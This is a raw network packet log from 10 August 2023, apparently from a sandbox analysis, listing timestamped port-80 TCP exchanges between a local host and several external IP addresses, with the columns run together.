                                                                                                                                                                                          Aug 10, 2023 10:19:20.598419905 CEST4972580192.168.11.20162.0.239.145
                                                                                                                                                                                          Aug 10, 2023 10:19:20.767143011 CEST8049725162.0.239.145192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:19:25.620157003 CEST4972680192.168.11.20104.21.62.30
                                                                                                                                                                                          Aug 10, 2023 10:19:25.629208088 CEST8049726104.21.62.30192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:19:25.629426956 CEST4972680192.168.11.20104.21.62.30
                                                                                                                                                                                          Aug 10, 2023 10:19:25.629587889 CEST4972680192.168.11.20104.21.62.30
                                                                                                                                                                                          Aug 10, 2023 10:19:25.638452053 CEST8049726104.21.62.30192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:19:25.673523903 CEST8049726104.21.62.30192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:19:25.673584938 CEST8049726104.21.62.30192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:19:25.673780918 CEST4972680192.168.11.20104.21.62.30
                                                                                                                                                                                          Aug 10, 2023 10:19:25.674273968 CEST8049726104.21.62.30192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:19:25.674460888 CEST4972680192.168.11.20104.21.62.30
                                                                                                                                                                                          Aug 10, 2023 10:19:27.131732941 CEST4972680192.168.11.20104.21.62.30
                                                                                                                                                                                          Aug 10, 2023 10:19:28.147186995 CEST4972780192.168.11.20104.21.62.30
                                                                                                                                                                                          Aug 10, 2023 10:19:28.155767918 CEST8049727104.21.62.30192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:19:28.155941010 CEST4972780192.168.11.20104.21.62.30
                                                                                                                                                                                          Aug 10, 2023 10:19:28.156085014 CEST4972780192.168.11.20104.21.62.30
                                                                                                                                                                                          Aug 10, 2023 10:19:28.164462090 CEST8049727104.21.62.30192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:19:28.193677902 CEST8049727104.21.62.30192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:19:28.193690062 CEST8049727104.21.62.30192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:19:28.193826914 CEST4972780192.168.11.20104.21.62.30
                                                                                                                                                                                          Aug 10, 2023 10:19:28.193892956 CEST8049727104.21.62.30192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:19:28.194029093 CEST4972780192.168.11.20104.21.62.30
                                                                                                                                                                                          Aug 10, 2023 10:19:29.662379980 CEST4972780192.168.11.20104.21.62.30
                                                                                                                                                                                          Aug 10, 2023 10:19:30.678184032 CEST4972880192.168.11.20104.21.62.30
                                                                                                                                                                                          Aug 10, 2023 10:19:30.686903000 CEST8049728104.21.62.30192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:19:30.687134027 CEST4972880192.168.11.20104.21.62.30
                                                                                                                                                                                          Aug 10, 2023 10:19:30.687652111 CEST4972880192.168.11.20104.21.62.30
                                                                                                                                                                                          Aug 10, 2023 10:19:30.687736034 CEST4972880192.168.11.20104.21.62.30
                                                                                                                                                                                          Aug 10, 2023 10:19:30.696322918 CEST8049728104.21.62.30192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:19:30.696351051 CEST8049728104.21.62.30192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:19:30.696525097 CEST4972880192.168.11.20104.21.62.30
                                                                                                                                                                                          Aug 10, 2023 10:19:30.696645021 CEST8049728104.21.62.30192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:19:30.696681976 CEST4972880192.168.11.20104.21.62.30
                                                                                                                                                                                          Aug 10, 2023 10:19:30.696722031 CEST8049728104.21.62.30192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:19:30.696805954 CEST8049728104.21.62.30192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:19:30.696826935 CEST8049728104.21.62.30192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:19:30.696850061 CEST4972880192.168.11.20104.21.62.30
                                                                                                                                                                                          Aug 10, 2023 10:19:30.697017908 CEST4972880192.168.11.20104.21.62.30
                                                                                                                                                                                          Aug 10, 2023 10:19:30.697022915 CEST8049728104.21.62.30192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:19:30.697043896 CEST8049728104.21.62.30192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:19:30.697192907 CEST4972880192.168.11.20104.21.62.30
                                                                                                                                                                                          Aug 10, 2023 10:19:30.697361946 CEST4972880192.168.11.20104.21.62.30
                                                                                                                                                                                          Aug 10, 2023 10:19:30.705249071 CEST8049728104.21.62.30192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:19:30.705277920 CEST8049728104.21.62.30192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:19:30.705297947 CEST8049728104.21.62.30192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:19:30.705317974 CEST8049728104.21.62.30192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:19:30.705338001 CEST8049728104.21.62.30192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:19:30.705357075 CEST8049728104.21.62.30192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:19:30.705461979 CEST4972880192.168.11.20104.21.62.30
                                                                                                                                                                                          Aug 10, 2023 10:19:30.705568075 CEST8049728104.21.62.30192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:19:30.705595970 CEST8049728104.21.62.30192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:19:30.705629110 CEST4972880192.168.11.20104.21.62.30
                                                                                                                                                                                          Aug 10, 2023 10:19:30.705698013 CEST8049728104.21.62.30192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:19:30.705909967 CEST8049728104.21.62.30192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:19:30.706020117 CEST8049728104.21.62.30192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:19:30.706039906 CEST8049728104.21.62.30192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:19:30.714051962 CEST8049728104.21.62.30192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:19:30.714085102 CEST8049728104.21.62.30192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:19:30.714323044 CEST8049728104.21.62.30192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:19:30.714365005 CEST8049728104.21.62.30192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:19:30.714556932 CEST8049728104.21.62.30192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:19:30.714585066 CEST8049728104.21.62.30192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:19:30.749484062 CEST8049728104.21.62.30192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:19:30.749526978 CEST8049728104.21.62.30192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:19:30.749557018 CEST8049728104.21.62.30192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:19:30.749682903 CEST4972880192.168.11.20104.21.62.30
                                                                                                                                                                                          Aug 10, 2023 10:19:30.749682903 CEST4972880192.168.11.20104.21.62.30
                                                                                                                                                                                          Aug 10, 2023 10:19:32.193020105 CEST4972880192.168.11.20104.21.62.30
                                                                                                                                                                                          Aug 10, 2023 10:19:33.208805084 CEST4972980192.168.11.20104.21.62.30
                                                                                                                                                                                          Aug 10, 2023 10:19:33.217717886 CEST8049729104.21.62.30192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:19:33.218010902 CEST4972980192.168.11.20104.21.62.30
                                                                                                                                                                                          Aug 10, 2023 10:19:33.218143940 CEST4972980192.168.11.20104.21.62.30
                                                                                                                                                                                          Aug 10, 2023 10:19:33.227019072 CEST8049729104.21.62.30192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:19:33.260078907 CEST8049729104.21.62.30192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:19:33.260174036 CEST8049729104.21.62.30192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:19:33.260560036 CEST4972980192.168.11.20104.21.62.30
                                                                                                                                                                                          Aug 10, 2023 10:19:33.260560036 CEST4972980192.168.11.20104.21.62.30
                                                                                                                                                                                          Aug 10, 2023 10:19:33.269476891 CEST8049729104.21.62.30192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:19:38.531416893 CEST4973080192.168.11.2051.79.96.115
                                                                                                                                                                                          Aug 10, 2023 10:19:38.625540018 CEST804973051.79.96.115192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:19:38.625725031 CEST4973080192.168.11.2051.79.96.115
                                                                                                                                                                                          Aug 10, 2023 10:19:38.625827074 CEST4973080192.168.11.2051.79.96.115
                                                                                                                                                                                          Aug 10, 2023 10:19:38.722017050 CEST804973051.79.96.115192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:19:38.722115993 CEST804973051.79.96.115192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:19:38.722161055 CEST804973051.79.96.115192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:19:38.722393990 CEST4973080192.168.11.2051.79.96.115
                                                                                                                                                                                          Aug 10, 2023 10:19:40.166173935 CEST4973080192.168.11.2051.79.96.115
                                                                                                                                                                                          Aug 10, 2023 10:19:41.435688019 CEST4973180192.168.11.2051.79.96.115
                                                                                                                                                                                          Aug 10, 2023 10:19:41.533174992 CEST804973151.79.96.115192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:19:41.533329010 CEST4973180192.168.11.2051.79.96.115
                                                                                                                                                                                          Aug 10, 2023 10:19:41.533492088 CEST4973180192.168.11.2051.79.96.115
                                                                                                                                                                                          Aug 10, 2023 10:19:41.630922079 CEST804973151.79.96.115192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:19:41.631089926 CEST804973151.79.96.115192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:19:41.631160975 CEST804973151.79.96.115192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:19:41.631268024 CEST4973180192.168.11.2051.79.96.115
                                                                                                                                                                                          Aug 10, 2023 10:19:43.034418106 CEST4973180192.168.11.2051.79.96.115
                                                                                                                                                                                          Aug 10, 2023 10:19:44.050079107 CEST4973280192.168.11.2051.79.96.115
                                                                                                                                                                                          Aug 10, 2023 10:19:44.148912907 CEST804973251.79.96.115192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:19:44.149127007 CEST4973280192.168.11.2051.79.96.115
                                                                                                                                                                                          Aug 10, 2023 10:19:44.149688005 CEST4973280192.168.11.2051.79.96.115
                                                                                                                                                                                          Aug 10, 2023 10:19:44.245146990 CEST804973251.79.96.115192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:19:44.245330095 CEST804973251.79.96.115192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:19:44.245374918 CEST4973280192.168.11.2051.79.96.115
                                                                                                                                                                                          Aug 10, 2023 10:19:44.245397091 CEST804973251.79.96.115192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:19:44.245512009 CEST804973251.79.96.115192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:19:44.245657921 CEST4973280192.168.11.2051.79.96.115
                                                                                                                                                                                          Aug 10, 2023 10:19:44.245789051 CEST804973251.79.96.115192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:19:44.245917082 CEST804973251.79.96.115192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:19:44.245985985 CEST804973251.79.96.115192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:19:44.246051073 CEST804973251.79.96.115192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:19:44.246121883 CEST804973251.79.96.115192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:19:44.340956926 CEST804973251.79.96.115192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:19:44.341248035 CEST804973251.79.96.115192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:19:44.341284990 CEST804973251.79.96.115192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:19:46.674485922 CEST4973380192.168.11.2051.79.96.115
                                                                                                                                                                                          Aug 10, 2023 10:19:46.769927025 CEST804973351.79.96.115192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:19:46.770153999 CEST4973380192.168.11.2051.79.96.115
                                                                                                                                                                                          Aug 10, 2023 10:19:46.770226002 CEST4973380192.168.11.2051.79.96.115
                                                                                                                                                                                          Aug 10, 2023 10:19:46.865716934 CEST804973351.79.96.115192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:19:46.865792036 CEST804973351.79.96.115192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:19:46.865840912 CEST804973351.79.96.115192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:19:46.866148949 CEST4973380192.168.11.2051.79.96.115
                                                                                                                                                                                          Aug 10, 2023 10:19:46.866205931 CEST4973380192.168.11.2051.79.96.115
                                                                                                                                                                                          Aug 10, 2023 10:19:46.961796045 CEST804973351.79.96.115192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:19:51.890862942 CEST4973480192.168.11.20169.150.247.39
                                                                                                                                                                                          Aug 10, 2023 10:19:51.900248051 CEST8049734169.150.247.39192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:19:51.900470972 CEST4973480192.168.11.20169.150.247.39
                                                                                                                                                                                          Aug 10, 2023 10:19:51.900604010 CEST4973480192.168.11.20169.150.247.39
                                                                                                                                                                                          Aug 10, 2023 10:19:51.910041094 CEST8049734169.150.247.39192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:19:52.087491989 CEST8049734169.150.247.39192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:19:52.087554932 CEST8049734169.150.247.39192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:19:52.087605953 CEST8049734169.150.247.39192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:19:52.087661028 CEST4973480192.168.11.20169.150.247.39
                                                                                                                                                                                          Aug 10, 2023 10:19:52.087744951 CEST4973480192.168.11.20169.150.247.39
                                                                                                                                                                                          Aug 10, 2023 10:19:53.407172918 CEST4973480192.168.11.20169.150.247.39
                                                                                                                                                                                          Aug 10, 2023 10:19:54.422820091 CEST4973580192.168.11.20169.150.247.39
                                                                                                                                                                                          Aug 10, 2023 10:19:54.432600021 CEST8049735169.150.247.39192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:19:54.432779074 CEST4973580192.168.11.20169.150.247.39
                                                                                                                                                                                          Aug 10, 2023 10:19:54.432908058 CEST4973580192.168.11.20169.150.247.39
                                                                                                                                                                                          Aug 10, 2023 10:19:54.442473888 CEST8049735169.150.247.39192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:19:54.531361103 CEST8049735169.150.247.39192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:19:54.531399965 CEST8049735169.150.247.39192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:19:54.531429052 CEST8049735169.150.247.39192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:19:54.531904936 CEST4973580192.168.11.20169.150.247.39
                                                                                                                                                                                          Aug 10, 2023 10:19:55.937814951 CEST4973580192.168.11.20169.150.247.39
                                                                                                                                                                                          Aug 10, 2023 10:19:56.953536987 CEST4973680192.168.11.20169.150.247.39
                                                                                                                                                                                          Aug 10, 2023 10:19:56.963423014 CEST8049736169.150.247.39192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:19:56.963660002 CEST4973680192.168.11.20169.150.247.39
                                                                                                                                                                                          Aug 10, 2023 10:19:56.964212894 CEST4973680192.168.11.20169.150.247.39
                                                                                                                                                                                          Aug 10, 2023 10:19:56.964298010 CEST4973680192.168.11.20169.150.247.39
                                                                                                                                                                                          Aug 10, 2023 10:19:56.973954916 CEST8049736169.150.247.39192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:19:56.974040985 CEST8049736169.150.247.39192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:19:56.974082947 CEST8049736169.150.247.39192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:19:56.974145889 CEST8049736169.150.247.39192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:19:56.974169016 CEST4973680192.168.11.20169.150.247.39
                                                                                                                                                                                          Aug 10, 2023 10:19:56.974215031 CEST8049736169.150.247.39192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:19:56.974302053 CEST8049736169.150.247.39192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:19:56.974329948 CEST4973680192.168.11.20169.150.247.39
                                                                                                                                                                                          Aug 10, 2023 10:19:56.974518061 CEST4973680192.168.11.20169.150.247.39
                                                                                                                                                                                          Aug 10, 2023 10:19:56.974575996 CEST8049736169.150.247.39192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:19:56.974642992 CEST8049736169.150.247.39192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:19:56.974668980 CEST4973680192.168.11.20169.150.247.39
                                                                                                                                                                                          Aug 10, 2023 10:19:56.974700928 CEST8049736169.150.247.39192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:19:56.974760056 CEST8049736169.150.247.39192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:19:56.974841118 CEST4973680192.168.11.20169.150.247.39
                                                                                                                                                                                          Aug 10, 2023 10:19:56.975020885 CEST4973680192.168.11.20169.150.247.39
                                                                                                                                                                                          Aug 10, 2023 10:19:56.984062910 CEST8049736169.150.247.39192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:19:56.984226942 CEST8049736169.150.247.39192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:19:56.984270096 CEST4973680192.168.11.20169.150.247.39
                                                                                                                                                                                          Aug 10, 2023 10:19:56.984402895 CEST8049736169.150.247.39192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:19:56.984433889 CEST4973680192.168.11.20169.150.247.39
                                                                                                                                                                                          Aug 10, 2023 10:19:56.984507084 CEST8049736169.150.247.39192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:19:56.984607935 CEST4973680192.168.11.20169.150.247.39
                                                                                                                                                                                          Aug 10, 2023 10:19:56.984776974 CEST4973680192.168.11.20169.150.247.39
                                                                                                                                                                                          Aug 10, 2023 10:19:56.984786987 CEST8049736169.150.247.39192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:19:56.984888077 CEST8049736169.150.247.39192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:19:56.984937906 CEST4973680192.168.11.20169.150.247.39
                                                                                                                                                                                          Aug 10, 2023 10:19:56.985013962 CEST8049736169.150.247.39192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:19:56.985114098 CEST4973680192.168.11.20169.150.247.39
                                                                                                                                                                                          Aug 10, 2023 10:19:56.985124111 CEST8049736169.150.247.39192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:19:56.985265970 CEST8049736169.150.247.39192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:19:56.985374928 CEST8049736169.150.247.39192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:19:56.985507965 CEST8049736169.150.247.39192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:19:56.985629082 CEST8049736169.150.247.39192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:19:56.985704899 CEST8049736169.150.247.39192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:19:56.985773087 CEST8049736169.150.247.39192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:19:56.985848904 CEST8049736169.150.247.39192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:19:56.985927105 CEST8049736169.150.247.39192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:19:56.985997915 CEST8049736169.150.247.39192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:19:56.986073017 CEST8049736169.150.247.39192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:19:56.986154079 CEST8049736169.150.247.39192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:19:56.994214058 CEST8049736169.150.247.39192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:19:56.995824099 CEST8049736169.150.247.39192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:19:56.995903015 CEST8049736169.150.247.39192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:19:56.995997906 CEST8049736169.150.247.39192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:19:56.996145964 CEST8049736169.150.247.39192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:19:56.996273994 CEST8049736169.150.247.39192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:19:56.996397972 CEST8049736169.150.247.39192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:19:56.996520042 CEST8049736169.150.247.39192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:19:56.996666908 CEST8049736169.150.247.39192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:19:56.996743917 CEST8049736169.150.247.39192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:19:56.997035027 CEST8049736169.150.247.39192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:19:56.997090101 CEST8049736169.150.247.39192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:19:57.068166971 CEST8049736169.150.247.39192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:19:57.068238974 CEST8049736169.150.247.39192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:19:57.068289995 CEST8049736169.150.247.39192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:19:57.068423033 CEST4973680192.168.11.20169.150.247.39
                                                                                                                                                                                          Aug 10, 2023 10:19:58.468406916 CEST4973680192.168.11.20169.150.247.39
                                                                                                                                                                                          Aug 10, 2023 10:19:59.484189987 CEST4973780192.168.11.20169.150.247.39
                                                                                                                                                                                          Aug 10, 2023 10:19:59.494041920 CEST8049737169.150.247.39192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:19:59.494298935 CEST4973780192.168.11.20169.150.247.39
                                                                                                                                                                                          Aug 10, 2023 10:19:59.494374990 CEST4973780192.168.11.20169.150.247.39
                                                                                                                                                                                          Aug 10, 2023 10:19:59.504193068 CEST8049737169.150.247.39192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:19:59.680810928 CEST8049737169.150.247.39192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:19:59.680876970 CEST8049737169.150.247.39192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:19:59.680929899 CEST8049737169.150.247.39192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:19:59.681329966 CEST4973780192.168.11.20169.150.247.39
                                                                                                                                                                                          Aug 10, 2023 10:19:59.681490898 CEST4973780192.168.11.20169.150.247.39
                                                                                                                                                                                          Aug 10, 2023 10:19:59.691251040 CEST8049737169.150.247.39192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:20:04.813865900 CEST4973880192.168.11.2091.189.114.27
                                                                                                                                                                                          Aug 10, 2023 10:20:04.859186888 CEST804973891.189.114.27192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:20:04.859388113 CEST4973880192.168.11.2091.189.114.27
                                                                                                                                                                                          Aug 10, 2023 10:20:04.859543085 CEST4973880192.168.11.2091.189.114.27
                                                                                                                                                                                          Aug 10, 2023 10:20:04.904895067 CEST804973891.189.114.27192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:20:04.906179905 CEST804973891.189.114.27192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:20:04.906194925 CEST804973891.189.114.27192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:20:04.906301022 CEST804973891.189.114.27192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:20:04.906316996 CEST804973891.189.114.27192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:20:04.906332970 CEST804973891.189.114.27192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:20:04.906344891 CEST804973891.189.114.27192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:20:04.906356096 CEST804973891.189.114.27192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:20:04.906435966 CEST804973891.189.114.27192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:20:04.906447887 CEST804973891.189.114.27192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:20:04.906450033 CEST4973880192.168.11.2091.189.114.27
                                                                                                                                                                                          Aug 10, 2023 10:20:04.906450033 CEST4973880192.168.11.2091.189.114.27
                                                                                                                                                                                          Aug 10, 2023 10:20:04.906459093 CEST804973891.189.114.27192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:20:04.906584978 CEST4973880192.168.11.2091.189.114.27
                                                                                                                                                                                          Aug 10, 2023 10:20:04.906651974 CEST4973880192.168.11.2091.189.114.27
                                                                                                                                                                                          Aug 10, 2023 10:20:04.951984882 CEST804973891.189.114.27192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:20:04.951999903 CEST804973891.189.114.27192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:20:04.952213049 CEST4973880192.168.11.2091.189.114.27
                                                                                                                                                                                          Aug 10, 2023 10:20:04.953785896 CEST804973891.189.114.27192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:20:04.953922987 CEST804973891.189.114.27192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:20:04.954143047 CEST4973880192.168.11.2091.189.114.27
                                                                                                                                                                                          Aug 10, 2023 10:20:04.957575083 CEST804973891.189.114.27192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:20:04.957590103 CEST804973891.189.114.27192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:20:04.957760096 CEST4973880192.168.11.2091.189.114.27
                                                                                                                                                                                          Aug 10, 2023 10:20:04.960823059 CEST804973891.189.114.27192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:20:04.960927963 CEST804973891.189.114.27192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:20:04.961098909 CEST4973880192.168.11.2091.189.114.27
                                                                                                                                                                                          Aug 10, 2023 10:20:04.963084936 CEST804973891.189.114.27192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:20:04.963192940 CEST804973891.189.114.27192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:20:04.963404894 CEST4973880192.168.11.2091.189.114.27
                                                                                                                                                                                          Aug 10, 2023 10:20:04.965488911 CEST804973891.189.114.27192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:20:04.965503931 CEST804973891.189.114.27192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:20:04.965735912 CEST4973880192.168.11.2091.189.114.27
                                                                                                                                                                                          Aug 10, 2023 10:20:04.967657089 CEST804973891.189.114.27192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:20:04.967755079 CEST804973891.189.114.27192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:20:04.968005896 CEST4973880192.168.11.2091.189.114.27
                                                                                                                                                                                          Aug 10, 2023 10:20:04.969938040 CEST804973891.189.114.27192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:20:04.970046997 CEST804973891.189.114.27192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:20:04.970233917 CEST4973880192.168.11.2091.189.114.27
                                                                                                                                                                                          Aug 10, 2023 10:20:04.972193956 CEST804973891.189.114.27192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:20:04.972331047 CEST804973891.189.114.27192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:20:04.972492933 CEST4973880192.168.11.2091.189.114.27
                                                                                                                                                                                          Aug 10, 2023 10:20:04.974541903 CEST804973891.189.114.27192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:20:04.974556923 CEST804973891.189.114.27192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:20:04.974869967 CEST4973880192.168.11.2091.189.114.27
                                                                                                                                                                                          Aug 10, 2023 10:20:04.997675896 CEST804973891.189.114.27192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:20:04.997690916 CEST804973891.189.114.27192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:20:04.997869968 CEST4973880192.168.11.2091.189.114.27
                                                                                                                                                                                          Aug 10, 2023 10:20:04.998698950 CEST804973891.189.114.27192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:20:04.998713970 CEST804973891.189.114.27192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:20:04.998955965 CEST4973880192.168.11.2091.189.114.27
                                                                                                                                                                                          Aug 10, 2023 10:20:05.000689983 CEST804973891.189.114.27192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:20:05.000806093 CEST804973891.189.114.27192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:20:05.000982046 CEST4973880192.168.11.2091.189.114.27
                                                                                                                                                                                          Aug 10, 2023 10:20:05.002589941 CEST804973891.189.114.27192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:20:05.002696037 CEST804973891.189.114.27192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:20:05.003060102 CEST4973880192.168.11.2091.189.114.27
                                                                                                                                                                                          Aug 10, 2023 10:20:05.004571915 CEST804973891.189.114.27192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:20:05.004688025 CEST804973891.189.114.27192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:20:05.004992008 CEST4973880192.168.11.2091.189.114.27
